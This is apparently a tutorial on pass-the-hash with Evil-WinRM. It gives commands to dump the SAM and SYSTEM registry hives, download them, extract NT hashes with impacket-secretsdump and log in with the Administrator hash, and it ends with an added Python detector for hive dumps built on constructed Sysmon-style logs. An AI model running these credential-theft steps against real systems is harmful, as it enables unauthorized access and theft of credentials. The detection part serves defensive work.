Pass the hash with evil WinRM
If you have admin access or privileges to dump the SAM and SYSTEM hives with Evil-WinRM, you can perform Pass-the-Hash to connect to the victim machine with elevated privileges:
First, save the SAM and SYSTEM hives using reg.exe on the Windows machine:
Evil-WinRM PS C:\> reg save hklm\system system.bak
The operation completed successfully.
Evil-WinRM PS C:\> reg save hklm\sam sam.bak
The operation completed successfully.
Download the saved hives to your local machine:
Evil-WinRM PS C:\> download system.bak
Info: Download successful!
Evil-WinRM PS C:\> download sam.bak
Info: Download successful!
Next, use a tool like Impacket's secretsdump.py to extract the hashes from the SAM and SYSTEM hives:
impacket-secretsdump -sam sam.bak -system system.bak LOCAL
After extracting the hashes, you'll have the NT hash for the Administrator account, which is what the -H option of Evil-WinRM expects.
Finally, perform Pass-the-Hash to connect to the victim machine using Evil-WinRM.
evil-winrm -i [Target IP] -u [User(usually Administrator)] -H [Administrator_Hash]
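As a defensive counterpart to the steps above, here is an added detection example (not from the original page or the Evil-WinRM project) that flags reg.exe saving the SAM or SYSTEM hive and marks the hit as WinRM-originated when the parent process is the WS-Management provider host. The log records are constructed Sysmon-style process-creation events, and treating wsmprovhost.exe as the parent of a remote WinRM shell is an assumption.

```python
# Added example: flag SAM/SYSTEM hive dumps, the first step of the procedure
# above, in constructed Sysmon-style process-creation records (field names
# mirror Sysmon Event ID 1: Image, CommandLine, ParentImage).
import re
from typing import Dict, List

# reg.exe saving either credential hive, tolerant of case, quoting and the
# HKEY_LOCAL_MACHINE long form of the hive path.
HIVE_SAVE = re.compile(
    r"""\breg(?:\.exe)?\s+save\s+["']?(?:hklm|hkey_local_machine)\\(sam|system)\b""",
    re.IGNORECASE,
)

# Assumption: remote WinRM shells are spawned by the WS-Management provider host.
WINRM_HOST = "wsmprovhost.exe"

CONSTRUCTED_EVENTS: List[Dict[str, str]] = [
    {"Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r"reg save hklm\system system.bak",
     "ParentImage": r"C:\Windows\System32\wsmprovhost.exe"},
    {"Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r'reg.exe save "HKEY_LOCAL_MACHINE\SAM" sam.bak',
     "ParentImage": r"C:\Windows\System32\wsmprovhost.exe"},
    {"Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r"reg query hklm\software\microsoft\windows\currentversion\run",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r"reg save hklm\sam C:\temp\sam.hiv",
     "ParentImage": r"C:\Windows\explorer.exe"},
]

def classify(event: Dict[str, str]) -> str:
    """Return 'hive_dump_via_winrm', 'hive_dump' or 'benign' for one record."""
    if not HIVE_SAVE.search(event.get("CommandLine", "")):
        return "benign"
    parent = event.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    return "hive_dump_via_winrm" if parent == WINRM_HOST else "hive_dump"

def find_hive_dumps(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Return the records that save SAM or SYSTEM, annotated with hive and verdict."""
    hits = []
    for ev in events:
        verdict = classify(ev)
        if verdict != "benign":
            hive = HIVE_SAVE.search(ev["CommandLine"]).group(1).upper()
            hits.append({**ev, "Hive": hive, "Verdict": verdict})
    return hits
```

In a real pipeline the same rule would be fed from Sysmon Event ID 1 or Security Event ID 4688 with command-line auditing enabled.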